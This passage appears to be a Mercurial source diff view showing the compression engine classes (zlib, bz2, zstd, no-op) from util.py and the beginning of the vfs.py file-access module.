3236 assert role in (SERVERROLE, CLIENTROLE)
3222
3237
3223 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3238 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3224
3239
3225 engines = [self._engines[e] for e in self._wiretypes.values()]
3240 engines = [self._engines[e] for e in self._wiretypes.values()]
3226 if onlyavailable:
3241 if onlyavailable:
3227 engines = [e for e in engines if e.available()]
3242 engines = [e for e in engines if e.available()]
3228
3243
3229 def getkey(e):
3244 def getkey(e):
3230 # Sort first by priority, highest first. In case of tie, sort
3245 # Sort first by priority, highest first. In case of tie, sort
3231 # alphabetically. This is arbitrary, but ensures output is
3246 # alphabetically. This is arbitrary, but ensures output is
3232 # stable.
3247 # stable.
3233 w = e.wireprotosupport()
3248 w = e.wireprotosupport()
3234 return -1 * getattr(w, attr), w.name
3249 return -1 * getattr(w, attr), w.name
3235
3250
3236 return list(sorted(engines, key=getkey))
3251 return list(sorted(engines, key=getkey))
3237
3252
3238 def forwiretype(self, wiretype):
3253 def forwiretype(self, wiretype):
3239 engine = self._engines[self._wiretypes[wiretype]]
3254 engine = self._engines[self._wiretypes[wiretype]]
3240 if not engine.available():
3255 if not engine.available():
3241 raise error.Abort(_('compression engine %s could not be loaded') %
3256 raise error.Abort(_('compression engine %s could not be loaded') %
3242 engine.name())
3257 engine.name())
3243 return engine
3258 return engine
3244
3259
3245 def forrevlogheader(self, header):
3260 def forrevlogheader(self, header):
3246 """Obtain a compression engine registered to a revlog header.
3261 """Obtain a compression engine registered to a revlog header.
3247
3262
3248 Will raise KeyError if the revlog header value isn't registered.
3263 Will raise KeyError if the revlog header value isn't registered.
3249 """
3264 """
3250 return self._engines[self._revlogheaders[header]]
3265 return self._engines[self._revlogheaders[header]]
3251
3266
3252 compengines = compressormanager()
3267 compengines = compressormanager()
3253
3268
3254 class compressionengine(object):
3269 class compressionengine(object):
3255 """Base class for compression engines.
3270 """Base class for compression engines.
3256
3271
3257 Compression engines must implement the interface defined by this class.
3272 Compression engines must implement the interface defined by this class.
3258 """
3273 """
3259 def name(self):
3274 def name(self):
3260 """Returns the name of the compression engine.
3275 """Returns the name of the compression engine.
3261
3276
3262 This is the key the engine is registered under.
3277 This is the key the engine is registered under.
3263
3278
3264 This method must be implemented.
3279 This method must be implemented.
3265 """
3280 """
3266 raise NotImplementedError()
3281 raise NotImplementedError()
3267
3282
3268 def available(self):
3283 def available(self):
3269 """Whether the compression engine is available.
3284 """Whether the compression engine is available.
3270
3285
3271 The intent of this method is to allow optional compression engines
3286 The intent of this method is to allow optional compression engines
3272 that may not be available in all installations (such as engines relying
3287 that may not be available in all installations (such as engines relying
3273 on C extensions that may not be present).
3288 on C extensions that may not be present).
3274 """
3289 """
3275 return True
3290 return True
3276
3291
3277 def bundletype(self):
3292 def bundletype(self):
3278 """Describes bundle identifiers for this engine.
3293 """Describes bundle identifiers for this engine.
3279
3294
3280 If this compression engine isn't supported for bundles, returns None.
3295 If this compression engine isn't supported for bundles, returns None.
3281
3296
3282 If this engine can be used for bundles, returns a 2-tuple of strings of
3297 If this engine can be used for bundles, returns a 2-tuple of strings of
3283 the user-facing "bundle spec" compression name and an internal
3298 the user-facing "bundle spec" compression name and an internal
3284 identifier used to denote the compression format within bundles. To
3299 identifier used to denote the compression format within bundles. To
3285 exclude the name from external usage, set the first element to ``None``.
3300 exclude the name from external usage, set the first element to ``None``.
3286
3301
3287 If bundle compression is supported, the class must also implement
3302 If bundle compression is supported, the class must also implement
3288 ``compressstream`` and `decompressorreader``.
3303 ``compressstream`` and `decompressorreader``.
3289
3304
3290 The docstring of this method is used in the help system to tell users
3305 The docstring of this method is used in the help system to tell users
3291 about this engine.
3306 about this engine.
3292 """
3307 """
3293 return None
3308 return None
3294
3309
3295 def wireprotosupport(self):
3310 def wireprotosupport(self):
3296 """Declare support for this compression format on the wire protocol.
3311 """Declare support for this compression format on the wire protocol.
3297
3312
3298 If this compression engine isn't supported for compressing wire
3313 If this compression engine isn't supported for compressing wire
3299 protocol payloads, returns None.
3314 protocol payloads, returns None.
3300
3315
3301 Otherwise, returns ``compenginewireprotosupport`` with the following
3316 Otherwise, returns ``compenginewireprotosupport`` with the following
3302 fields:
3317 fields:
3303
3318
3304 * String format identifier
3319 * String format identifier
3305 * Integer priority for the server
3320 * Integer priority for the server
3306 * Integer priority for the client
3321 * Integer priority for the client
3307
3322
3308 The integer priorities are used to order the advertisement of format
3323 The integer priorities are used to order the advertisement of format
3309 support by server and client. The highest integer is advertised
3324 support by server and client. The highest integer is advertised
3310 first. Integers with non-positive values aren't advertised.
3325 first. Integers with non-positive values aren't advertised.
3311
3326
3312 The priority values are somewhat arbitrary and only used for default
3327 The priority values are somewhat arbitrary and only used for default
3313 ordering. The relative order can be changed via config options.
3328 ordering. The relative order can be changed via config options.
3314
3329
3315 If wire protocol compression is supported, the class must also implement
3330 If wire protocol compression is supported, the class must also implement
3316 ``compressstream`` and ``decompressorreader``.
3331 ``compressstream`` and ``decompressorreader``.
3317 """
3332 """
3318 return None
3333 return None
3319
3334
3320 def revlogheader(self):
3335 def revlogheader(self):
3321 """Header added to revlog chunks that identifies this engine.
3336 """Header added to revlog chunks that identifies this engine.
3322
3337
3323 If this engine can be used to compress revlogs, this method should
3338 If this engine can be used to compress revlogs, this method should
3324 return the bytes used to identify chunks compressed with this engine.
3339 return the bytes used to identify chunks compressed with this engine.
3325 Else, the method should return ``None`` to indicate it does not
3340 Else, the method should return ``None`` to indicate it does not
3326 participate in revlog compression.
3341 participate in revlog compression.
3327 """
3342 """
3328 return None
3343 return None
3329
3344
3330 def compressstream(self, it, opts=None):
3345 def compressstream(self, it, opts=None):
3331 """Compress an iterator of chunks.
3346 """Compress an iterator of chunks.
3332
3347
3333 The method receives an iterator (ideally a generator) of chunks of
3348 The method receives an iterator (ideally a generator) of chunks of
3334 bytes to be compressed. It returns an iterator (ideally a generator)
3349 bytes to be compressed. It returns an iterator (ideally a generator)
3335 of bytes of chunks representing the compressed output.
3350 of bytes of chunks representing the compressed output.
3336
3351
3337 Optionally accepts an argument defining how to perform compression.
3352 Optionally accepts an argument defining how to perform compression.
3338 Each engine treats this argument differently.
3353 Each engine treats this argument differently.
3339 """
3354 """
3340 raise NotImplementedError()
3355 raise NotImplementedError()
3341
3356
3342 def decompressorreader(self, fh):
3357 def decompressorreader(self, fh):
3343 """Perform decompression on a file object.
3358 """Perform decompression on a file object.
3344
3359
3345 Argument is an object with a ``read(size)`` method that returns
3360 Argument is an object with a ``read(size)`` method that returns
3346 compressed data. Return value is an object with a ``read(size)`` that
3361 compressed data. Return value is an object with a ``read(size)`` that
3347 returns uncompressed data.
3362 returns uncompressed data.
3348 """
3363 """
3349 raise NotImplementedError()
3364 raise NotImplementedError()
3350
3365
3351 def revlogcompressor(self, opts=None):
3366 def revlogcompressor(self, opts=None):
3352 """Obtain an object that can be used to compress revlog entries.
3367 """Obtain an object that can be used to compress revlog entries.
3353
3368
3354 The object has a ``compress(data)`` method that compresses binary
3369 The object has a ``compress(data)`` method that compresses binary
3355 data. This method returns compressed binary data or ``None`` if
3370 data. This method returns compressed binary data or ``None`` if
3356 the data could not be compressed (too small, not compressible, etc).
3371 the data could not be compressed (too small, not compressible, etc).
3357 The returned data should have a header uniquely identifying this
3372 The returned data should have a header uniquely identifying this
3358 compression format so decompression can be routed to this engine.
3373 compression format so decompression can be routed to this engine.
3359 This header should be identified by the ``revlogheader()`` return
3374 This header should be identified by the ``revlogheader()`` return
3360 value.
3375 value.
3361
3376
3362 The object has a ``decompress(data)`` method that decompresses
3377 The object has a ``decompress(data)`` method that decompresses
3363 data. The method will only be called if ``data`` begins with
3378 data. The method will only be called if ``data`` begins with
3364 ``revlogheader()``. The method should return the raw, uncompressed
3379 ``revlogheader()``. The method should return the raw, uncompressed
3365 data or raise a ``RevlogError``.
3380 data or raise a ``RevlogError``.
3366
3381
3367 The object is reusable but is not thread safe.
3382 The object is reusable but is not thread safe.
3368 """
3383 """
3369 raise NotImplementedError()
3384 raise NotImplementedError()
3370
3385
3371 class _zlibengine(compressionengine):
3386 class _zlibengine(compressionengine):
3372 def name(self):
3387 def name(self):
3373 return 'zlib'
3388 return 'zlib'
3374
3389
3375 def bundletype(self):
3390 def bundletype(self):
3376 """zlib compression using the DEFLATE algorithm.
3391 """zlib compression using the DEFLATE algorithm.
3377
3392
3378 All Mercurial clients should support this format. The compression
3393 All Mercurial clients should support this format. The compression
3379 algorithm strikes a reasonable balance between compression ratio
3394 algorithm strikes a reasonable balance between compression ratio
3380 and size.
3395 and size.
3381 """
3396 """
3382 return 'gzip', 'GZ'
3397 return 'gzip', 'GZ'
3383
3398
3384 def wireprotosupport(self):
3399 def wireprotosupport(self):
3385 return compewireprotosupport('zlib', 20, 20)
3400 return compewireprotosupport('zlib', 20, 20)
3386
3401
3387 def revlogheader(self):
3402 def revlogheader(self):
3388 return 'x'
3403 return 'x'
3389
3404
3390 def compressstream(self, it, opts=None):
3405 def compressstream(self, it, opts=None):
3391 opts = opts or {}
3406 opts = opts or {}
3392
3407
3393 z = zlib.compressobj(opts.get('level', -1))
3408 z = zlib.compressobj(opts.get('level', -1))
3394 for chunk in it:
3409 for chunk in it:
3395 data = z.compress(chunk)
3410 data = z.compress(chunk)
3396 # Not all calls to compress emit data. It is cheaper to inspect
3411 # Not all calls to compress emit data. It is cheaper to inspect
3397 # here than to feed empty chunks through generator.
3412 # here than to feed empty chunks through generator.
3398 if data:
3413 if data:
3399 yield data
3414 yield data
3400
3415
3401 yield z.flush()
3416 yield z.flush()
3402
3417
3403 def decompressorreader(self, fh):
3418 def decompressorreader(self, fh):
3404 def gen():
3419 def gen():
3405 d = zlib.decompressobj()
3420 d = zlib.decompressobj()
3406 for chunk in filechunkiter(fh):
3421 for chunk in filechunkiter(fh):
3407 while chunk:
3422 while chunk:
3408 # Limit output size to limit memory.
3423 # Limit output size to limit memory.
3409 yield d.decompress(chunk, 2 ** 18)
3424 yield d.decompress(chunk, 2 ** 18)
3410 chunk = d.unconsumed_tail
3425 chunk = d.unconsumed_tail
3411
3426
3412 return chunkbuffer(gen())
3427 return chunkbuffer(gen())
3413
3428
3414 class zlibrevlogcompressor(object):
3429 class zlibrevlogcompressor(object):
3415 def compress(self, data):
3430 def compress(self, data):
3416 insize = len(data)
3431 insize = len(data)
3417 # Caller handles empty input case.
3432 # Caller handles empty input case.
3418 assert insize > 0
3433 assert insize > 0
3419
3434
3420 if insize < 44:
3435 if insize < 44:
3421 return None
3436 return None
3422
3437
3423 elif insize <= 1000000:
3438 elif insize <= 1000000:
3424 compressed = zlib.compress(data)
3439 compressed = zlib.compress(data)
3425 if len(compressed) < insize:
3440 if len(compressed) < insize:
3426 return compressed
3441 return compressed
3427 return None
3442 return None
3428
3443
3429 # zlib makes an internal copy of the input buffer, doubling
3444 # zlib makes an internal copy of the input buffer, doubling
3430 # memory usage for large inputs. So do streaming compression
3445 # memory usage for large inputs. So do streaming compression
3431 # on large inputs.
3446 # on large inputs.
3432 else:
3447 else:
3433 z = zlib.compressobj()
3448 z = zlib.compressobj()
3434 parts = []
3449 parts = []
3435 pos = 0
3450 pos = 0
3436 while pos < insize:
3451 while pos < insize:
3437 pos2 = pos + 2**20
3452 pos2 = pos + 2**20
3438 parts.append(z.compress(data[pos:pos2]))
3453 parts.append(z.compress(data[pos:pos2]))
3439 pos = pos2
3454 pos = pos2
3440 parts.append(z.flush())
3455 parts.append(z.flush())
3441
3456
3442 if sum(map(len, parts)) < insize:
3457 if sum(map(len, parts)) < insize:
3443 return ''.join(parts)
3458 return ''.join(parts)
3444 return None
3459 return None
3445
3460
3446 def decompress(self, data):
3461 def decompress(self, data):
3447 try:
3462 try:
3448 return zlib.decompress(data)
3463 return zlib.decompress(data)
3449 except zlib.error as e:
3464 except zlib.error as e:
3450 raise error.RevlogError(_('revlog decompress error: %s') %
3465 raise error.RevlogError(_('revlog decompress error: %s') %
3451 str(e))
3466 str(e))
3452
3467
3453 def revlogcompressor(self, opts=None):
3468 def revlogcompressor(self, opts=None):
3454 return self.zlibrevlogcompressor()
3469 return self.zlibrevlogcompressor()
3455
3470
3456 compengines.register(_zlibengine())
3471 compengines.register(_zlibengine())
3457
3472
3458 class _bz2engine(compressionengine):
3473 class _bz2engine(compressionengine):
3459 def name(self):
3474 def name(self):
3460 return 'bz2'
3475 return 'bz2'
3461
3476
3462 def bundletype(self):
3477 def bundletype(self):
3463 """An algorithm that produces smaller bundles than ``gzip``.
3478 """An algorithm that produces smaller bundles than ``gzip``.
3464
3479
3465 All Mercurial clients should support this format.
3480 All Mercurial clients should support this format.
3466
3481
3467 This engine will likely produce smaller bundles than ``gzip`` but
3482 This engine will likely produce smaller bundles than ``gzip`` but
3468 will be significantly slower, both during compression and
3483 will be significantly slower, both during compression and
3469 decompression.
3484 decompression.
3470
3485
3471 If available, the ``zstd`` engine can yield similar or better
3486 If available, the ``zstd`` engine can yield similar or better
3472 compression at much higher speeds.
3487 compression at much higher speeds.
3473 """
3488 """
3474 return 'bzip2', 'BZ'
3489 return 'bzip2', 'BZ'
3475
3490
3476 # We declare a protocol name but don't advertise by default because
3491 # We declare a protocol name but don't advertise by default because
3477 # it is slow.
3492 # it is slow.
3478 def wireprotosupport(self):
3493 def wireprotosupport(self):
3479 return compewireprotosupport('bzip2', 0, 0)
3494 return compewireprotosupport('bzip2', 0, 0)
3480
3495
3481 def compressstream(self, it, opts=None):
3496 def compressstream(self, it, opts=None):
3482 opts = opts or {}
3497 opts = opts or {}
3483 z = bz2.BZ2Compressor(opts.get('level', 9))
3498 z = bz2.BZ2Compressor(opts.get('level', 9))
3484 for chunk in it:
3499 for chunk in it:
3485 data = z.compress(chunk)
3500 data = z.compress(chunk)
3486 if data:
3501 if data:
3487 yield data
3502 yield data
3488
3503
3489 yield z.flush()
3504 yield z.flush()
3490
3505
3491 def decompressorreader(self, fh):
3506 def decompressorreader(self, fh):
3492 def gen():
3507 def gen():
3493 d = bz2.BZ2Decompressor()
3508 d = bz2.BZ2Decompressor()
3494 for chunk in filechunkiter(fh):
3509 for chunk in filechunkiter(fh):
3495 yield d.decompress(chunk)
3510 yield d.decompress(chunk)
3496
3511
3497 return chunkbuffer(gen())
3512 return chunkbuffer(gen())
3498
3513
3499 compengines.register(_bz2engine())
3514 compengines.register(_bz2engine())
3500
3515
3501 class _truncatedbz2engine(compressionengine):
3516 class _truncatedbz2engine(compressionengine):
3502 def name(self):
3517 def name(self):
3503 return 'bz2truncated'
3518 return 'bz2truncated'
3504
3519
3505 def bundletype(self):
3520 def bundletype(self):
3506 return None, '_truncatedBZ'
3521 return None, '_truncatedBZ'
3507
3522
3508 # We don't implement compressstream because it is hackily handled elsewhere.
3523 # We don't implement compressstream because it is hackily handled elsewhere.
3509
3524
3510 def decompressorreader(self, fh):
3525 def decompressorreader(self, fh):
3511 def gen():
3526 def gen():
3512 # The input stream doesn't have the 'BZ' header. So add it back.
3527 # The input stream doesn't have the 'BZ' header. So add it back.
3513 d = bz2.BZ2Decompressor()
3528 d = bz2.BZ2Decompressor()
3514 d.decompress('BZ')
3529 d.decompress('BZ')
3515 for chunk in filechunkiter(fh):
3530 for chunk in filechunkiter(fh):
3516 yield d.decompress(chunk)
3531 yield d.decompress(chunk)
3517
3532
3518 return chunkbuffer(gen())
3533 return chunkbuffer(gen())
3519
3534
3520 compengines.register(_truncatedbz2engine())
3535 compengines.register(_truncatedbz2engine())
3521
3536
3522 class _noopengine(compressionengine):
3537 class _noopengine(compressionengine):
3523 def name(self):
3538 def name(self):
3524 return 'none'
3539 return 'none'
3525
3540
3526 def bundletype(self):
3541 def bundletype(self):
3527 """No compression is performed.
3542 """No compression is performed.
3528
3543
3529 Use this compression engine to explicitly disable compression.
3544 Use this compression engine to explicitly disable compression.
3530 """
3545 """
3531 return 'none', 'UN'
3546 return 'none', 'UN'
3532
3547
3533 # Clients always support uncompressed payloads. Servers don't because
3548 # Clients always support uncompressed payloads. Servers don't because
3534 # unless you are on a fast network, uncompressed payloads can easily
3549 # unless you are on a fast network, uncompressed payloads can easily
3535 # saturate your network pipe.
3550 # saturate your network pipe.
3536 def wireprotosupport(self):
3551 def wireprotosupport(self):
3537 return compewireprotosupport('none', 0, 10)
3552 return compewireprotosupport('none', 0, 10)
3538
3553
3539 # We don't implement revlogheader because it is handled specially
3554 # We don't implement revlogheader because it is handled specially
3540 # in the revlog class.
3555 # in the revlog class.
3541
3556
3542 def compressstream(self, it, opts=None):
3557 def compressstream(self, it, opts=None):
3543 return it
3558 return it
3544
3559
3545 def decompressorreader(self, fh):
3560 def decompressorreader(self, fh):
3546 return fh
3561 return fh
3547
3562
3548 class nooprevlogcompressor(object):
3563 class nooprevlogcompressor(object):
3549 def compress(self, data):
3564 def compress(self, data):
3550 return None
3565 return None
3551
3566
3552 def revlogcompressor(self, opts=None):
3567 def revlogcompressor(self, opts=None):
3553 return self.nooprevlogcompressor()
3568 return self.nooprevlogcompressor()
3554
3569
3555 compengines.register(_noopengine())
3570 compengines.register(_noopengine())
3556
3571
3557 class _zstdengine(compressionengine):
3572 class _zstdengine(compressionengine):
3558 def name(self):
3573 def name(self):
3559 return 'zstd'
3574 return 'zstd'
3560
3575
3561 @propertycache
3576 @propertycache
3562 def _module(self):
3577 def _module(self):
3563 # Not all installs have the zstd module available. So defer importing
3578 # Not all installs have the zstd module available. So defer importing
3564 # until first access.
3579 # until first access.
3565 try:
3580 try:
3566 from . import zstd
3581 from . import zstd
3567 # Force delayed import.
3582 # Force delayed import.
3568 zstd.__version__
3583 zstd.__version__
3569 return zstd
3584 return zstd
3570 except ImportError:
3585 except ImportError:
3571 return None
3586 return None
3572
3587
3573 def available(self):
3588 def available(self):
3574 return bool(self._module)
3589 return bool(self._module)
3575
3590
3576 def bundletype(self):
3591 def bundletype(self):
3577 """A modern compression algorithm that is fast and highly flexible.
3592 """A modern compression algorithm that is fast and highly flexible.
3578
3593
3579 Only supported by Mercurial 4.1 and newer clients.
3594 Only supported by Mercurial 4.1 and newer clients.
3580
3595
3581 With the default settings, zstd compression is both faster and yields
3596 With the default settings, zstd compression is both faster and yields
3582 better compression than ``gzip``. It also frequently yields better
3597 better compression than ``gzip``. It also frequently yields better
3583 compression than ``bzip2`` while operating at much higher speeds.
3598 compression than ``bzip2`` while operating at much higher speeds.
3584
3599
3585 If this engine is available and backwards compatibility is not a
3600 If this engine is available and backwards compatibility is not a
3586 concern, it is likely the best available engine.
3601 concern, it is likely the best available engine.
3587 """
3602 """
3588 return 'zstd', 'ZS'
3603 return 'zstd', 'ZS'
3589
3604
3590 def wireprotosupport(self):
3605 def wireprotosupport(self):
3591 return compewireprotosupport('zstd', 50, 50)
3606 return compewireprotosupport('zstd', 50, 50)
3592
3607
3593 def revlogheader(self):
3608 def revlogheader(self):
3594 return '\x28'
3609 return '\x28'
3595
3610
3596 def compressstream(self, it, opts=None):
3611 def compressstream(self, it, opts=None):
3597 opts = opts or {}
3612 opts = opts or {}
3598 # zstd level 3 is almost always significantly faster than zlib
3613 # zstd level 3 is almost always significantly faster than zlib
3599 # while providing no worse compression. It strikes a good balance
3614 # while providing no worse compression. It strikes a good balance
3600 # between speed and compression.
3615 # between speed and compression.
3601 level = opts.get('level', 3)
3616 level = opts.get('level', 3)
3602
3617
3603 zstd = self._module
3618 zstd = self._module
3604 z = zstd.ZstdCompressor(level=level).compressobj()
3619 z = zstd.ZstdCompressor(level=level).compressobj()
3605 for chunk in it:
3620 for chunk in it:
3606 data = z.compress(chunk)
3621 data = z.compress(chunk)
3607 if data:
3622 if data:
3608 yield data
3623 yield data
3609
3624
3610 yield z.flush()
3625 yield z.flush()
3611
3626
3612 def decompressorreader(self, fh):
3627 def decompressorreader(self, fh):
3613 zstd = self._module
3628 zstd = self._module
3614 dctx = zstd.ZstdDecompressor()
3629 dctx = zstd.ZstdDecompressor()
3615 return chunkbuffer(dctx.read_from(fh))
3630 return chunkbuffer(dctx.read_from(fh))
3616
3631
3617 class zstdrevlogcompressor(object):
3632 class zstdrevlogcompressor(object):
3618 def __init__(self, zstd, level=3):
3633 def __init__(self, zstd, level=3):
3619 # Writing the content size adds a few bytes to the output. However,
3634 # Writing the content size adds a few bytes to the output. However,
3620 # it allows decompression to be more optimal since we can
3635 # it allows decompression to be more optimal since we can
3621 # pre-allocate a buffer to hold the result.
3636 # pre-allocate a buffer to hold the result.
3622 self._cctx = zstd.ZstdCompressor(level=level,
3637 self._cctx = zstd.ZstdCompressor(level=level,
3623 write_content_size=True)
3638 write_content_size=True)
3624 self._dctx = zstd.ZstdDecompressor()
3639 self._dctx = zstd.ZstdDecompressor()
3625 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3640 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3626 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3641 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3627
3642
3628 def compress(self, data):
3643 def compress(self, data):
3629 insize = len(data)
3644 insize = len(data)
3630 # Caller handles empty input case.
3645 # Caller handles empty input case.
3631 assert insize > 0
3646 assert insize > 0
3632
3647
3633 if insize < 50:
3648 if insize < 50:
3634 return None
3649 return None
3635
3650
3636 elif insize <= 1000000:
3651 elif insize <= 1000000:
3637 compressed = self._cctx.compress(data)
3652 compressed = self._cctx.compress(data)
3638 if len(compressed) < insize:
3653 if len(compressed) < insize:
3639 return compressed
3654 return compressed
3640 return None
3655 return None
3641 else:
3656 else:
3642 z = self._cctx.compressobj()
3657 z = self._cctx.compressobj()
3643 chunks = []
3658 chunks = []
3644 pos = 0
3659 pos = 0
3645 while pos < insize:
3660 while pos < insize:
3646 pos2 = pos + self._compinsize
3661 pos2 = pos + self._compinsize
3647 chunk = z.compress(data[pos:pos2])
3662 chunk = z.compress(data[pos:pos2])
3648 if chunk:
3663 if chunk:
3649 chunks.append(chunk)
3664 chunks.append(chunk)
3650 pos = pos2
3665 pos = pos2
3651 chunks.append(z.flush())
3666 chunks.append(z.flush())
3652
3667
3653 if sum(map(len, chunks)) < insize:
3668 if sum(map(len, chunks)) < insize:
3654 return ''.join(chunks)
3669 return ''.join(chunks)
3655 return None
3670 return None
3656
3671
3657 def decompress(self, data):
3672 def decompress(self, data):
3658 insize = len(data)
3673 insize = len(data)
3659
3674
3660 try:
3675 try:
3661 # This was measured to be faster than other streaming
3676 # This was measured to be faster than other streaming
3662 # decompressors.
3677 # decompressors.
3663 dobj = self._dctx.decompressobj()
3678 dobj = self._dctx.decompressobj()
3664 chunks = []
3679 chunks = []
3665 pos = 0
3680 pos = 0
3666 while pos < insize:
3681 while pos < insize:
3667 pos2 = pos + self._decompinsize
3682 pos2 = pos + self._decompinsize
3668 chunk = dobj.decompress(data[pos:pos2])
3683 chunk = dobj.decompress(data[pos:pos2])
3669 if chunk:
3684 if chunk:
3670 chunks.append(chunk)
3685 chunks.append(chunk)
3671 pos = pos2
3686 pos = pos2
3672 # Frame should be exhausted, so no finish() API.
3687 # Frame should be exhausted, so no finish() API.
3673
3688
3674 return ''.join(chunks)
3689 return ''.join(chunks)
3675 except Exception as e:
3690 except Exception as e:
3676 raise error.RevlogError(_('revlog decompress error: %s') %
3691 raise error.RevlogError(_('revlog decompress error: %s') %
3677 str(e))
3692 str(e))
3678
3693
3679 def revlogcompressor(self, opts=None):
3694 def revlogcompressor(self, opts=None):
3680 opts = opts or {}
3695 opts = opts or {}
3681 return self.zstdrevlogcompressor(self._module,
3696 return self.zstdrevlogcompressor(self._module,
3682 level=opts.get('level', 3))
3697 level=opts.get('level', 3))
3683
3698
3684 compengines.register(_zstdengine())
3699 compengines.register(_zstdengine())
3685
3700
3686 def bundlecompressiontopics():
3701 def bundlecompressiontopics():
3687 """Obtains a list of available bundle compressions for use in help."""
3702 """Obtains a list of available bundle compressions for use in help."""
3688 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3703 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3689 items = {}
3704 items = {}
3690
3705
3691 # We need to format the docstring. So use a dummy object/type to hold it
3706 # We need to format the docstring. So use a dummy object/type to hold it
3692 # rather than mutating the original.
3707 # rather than mutating the original.
3693 class docobject(object):
3708 class docobject(object):
3694 pass
3709 pass
3695
3710
3696 for name in compengines:
3711 for name in compengines:
3697 engine = compengines[name]
3712 engine = compengines[name]
3698
3713
3699 if not engine.available():
3714 if not engine.available():
3700 continue
3715 continue
3701
3716
3702 bt = engine.bundletype()
3717 bt = engine.bundletype()
3703 if not bt or not bt[0]:
3718 if not bt or not bt[0]:
3704 continue
3719 continue
3705
3720
3706 doc = pycompat.sysstr('``%s``\n %s') % (
3721 doc = pycompat.sysstr('``%s``\n %s') % (
3707 bt[0], engine.bundletype.__doc__)
3722 bt[0], engine.bundletype.__doc__)
3708
3723
3709 value = docobject()
3724 value = docobject()
3710 value.__doc__ = doc
3725 value.__doc__ = doc
3711
3726
3712 items[bt[0]] = value
3727 items[bt[0]] = value
3713
3728
3714 return items
3729 return items
3715
3730
3716 # convenient shortcut
3731 # convenient shortcut
3717 dst = debugstacktrace
3732 dst = debugstacktrace
@@ -1,642 +1,647 b''
1 # vfs.py - Mercurial 'vfs' classes
1 # vfs.py - Mercurial 'vfs' classes
2 #
2 #
3 # Copyright Matt Mackall <mpm@selenic.com>
3 # Copyright Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7 from __future__ import absolute_import
7 from __future__ import absolute_import
8
8
9 import contextlib
9 import contextlib
10 import errno
10 import errno
11 import os
11 import os
12 import shutil
12 import shutil
13 import stat
13 import stat
14 import tempfile
14 import tempfile
15 import threading
15 import threading
16
16
17 from .i18n import _
17 from .i18n import _
18 from . import (
18 from . import (
19 error,
19 error,
20 pathutil,
20 pathutil,
21 pycompat,
21 pycompat,
22 util,
22 util,
23 )
23 )
24
24
25 def _avoidambig(path, oldstat):
25 def _avoidambig(path, oldstat):
26 """Avoid file stat ambiguity forcibly
26 """Avoid file stat ambiguity forcibly
27
27
28 This function causes copying ``path`` file, if it is owned by
28 This function causes copying ``path`` file, if it is owned by
29 another (see issue5418 and issue5584 for detail).
29 another (see issue5418 and issue5584 for detail).
30 """
30 """
31 def checkandavoid():
31 def checkandavoid():
32 newstat = util.filestat.frompath(path)
32 newstat = util.filestat.frompath(path)
33 # return whether file stat ambiguity is (already) avoided
33 # return whether file stat ambiguity is (already) avoided
34 return (not newstat.isambig(oldstat) or
34 return (not newstat.isambig(oldstat) or
35 newstat.avoidambig(path, oldstat))
35 newstat.avoidambig(path, oldstat))
36 if not checkandavoid():
36 if not checkandavoid():
37 # simply copy to change owner of path to get privilege to
37 # simply copy to change owner of path to get privilege to
38 # advance mtime (see issue5418)
38 # advance mtime (see issue5418)
39 util.rename(util.mktempcopy(path), path)
39 util.rename(util.mktempcopy(path), path)
40 checkandavoid()
40 checkandavoid()
41
41
42 class abstractvfs(object):
42 class abstractvfs(object):
43 """Abstract base class; cannot be instantiated"""
43 """Abstract base class; cannot be instantiated"""
44
44
45 def __init__(self, *args, **kwargs):
45 def __init__(self, *args, **kwargs):
46 '''Prevent instantiation; don't call this from subclasses.'''
46 '''Prevent instantiation; don't call this from subclasses.'''
47 raise NotImplementedError('attempted instantiating ' + str(type(self)))
47 raise NotImplementedError('attempted instantiating ' + str(type(self)))
48
48
49 def tryread(self, path):
49 def tryread(self, path):
50 '''gracefully return an empty string for missing files'''
50 '''gracefully return an empty string for missing files'''
51 try:
51 try:
52 return self.read(path)
52 return self.read(path)
53 except IOError as inst:
53 except IOError as inst:
54 if inst.errno != errno.ENOENT:
54 if inst.errno != errno.ENOENT:
55 raise
55 raise
56 return ""
56 return ""
57
57
58 def tryreadlines(self, path, mode='rb'):
58 def tryreadlines(self, path, mode='rb'):
59 '''gracefully return an empty array for missing files'''
59 '''gracefully return an empty array for missing files'''
60 try:
60 try:
61 return self.readlines(path, mode=mode)
61 return self.readlines(path, mode=mode)
62 except IOError as inst:
62 except IOError as inst:
63 if inst.errno != errno.ENOENT:
63 if inst.errno != errno.ENOENT:
64 raise
64 raise
65 return []
65 return []
66
66
67 @util.propertycache
67 @util.propertycache
68 def open(self):
68 def open(self):
69 '''Open ``path`` file, which is relative to vfs root.
69 '''Open ``path`` file, which is relative to vfs root.
70
70
71 Newly created directories are marked as "not to be indexed by
71 Newly created directories are marked as "not to be indexed by
72 the content indexing service", if ``notindexed`` is specified
72 the content indexing service", if ``notindexed`` is specified
73 for "write" mode access.
73 for "write" mode access.
74 '''
74 '''
75 return self.__call__
75 return self.__call__
76
76
77 def read(self, path):
77 def read(self, path):
78 with self(path, 'rb') as fp:
78 with self(path, 'rb') as fp:
79 return fp.read()
79 return fp.read()
80
80
81 def readlines(self, path, mode='rb'):
81 def readlines(self, path, mode='rb'):
82 with self(path, mode=mode) as fp:
82 with self(path, mode=mode) as fp:
83 return fp.readlines()
83 return fp.readlines()
84
84
85 def write(self, path, data, backgroundclose=False):
85 def write(self, path, data, backgroundclose=False):
86 with self(path, 'wb', backgroundclose=backgroundclose) as fp:
86 with self(path, 'wb', backgroundclose=backgroundclose) as fp:
87 return fp.write(data)
87 return fp.write(data)
88
88
89 def writelines(self, path, data, mode='wb', notindexed=False):
89 def writelines(self, path, data, mode='wb', notindexed=False):
90 with self(path, mode=mode, notindexed=notindexed) as fp:
90 with self(path, mode=mode, notindexed=notindexed) as fp:
91 return fp.writelines(data)
91 return fp.writelines(data)
92
92
93 def append(self, path, data):
93 def append(self, path, data):
94 with self(path, 'ab') as fp:
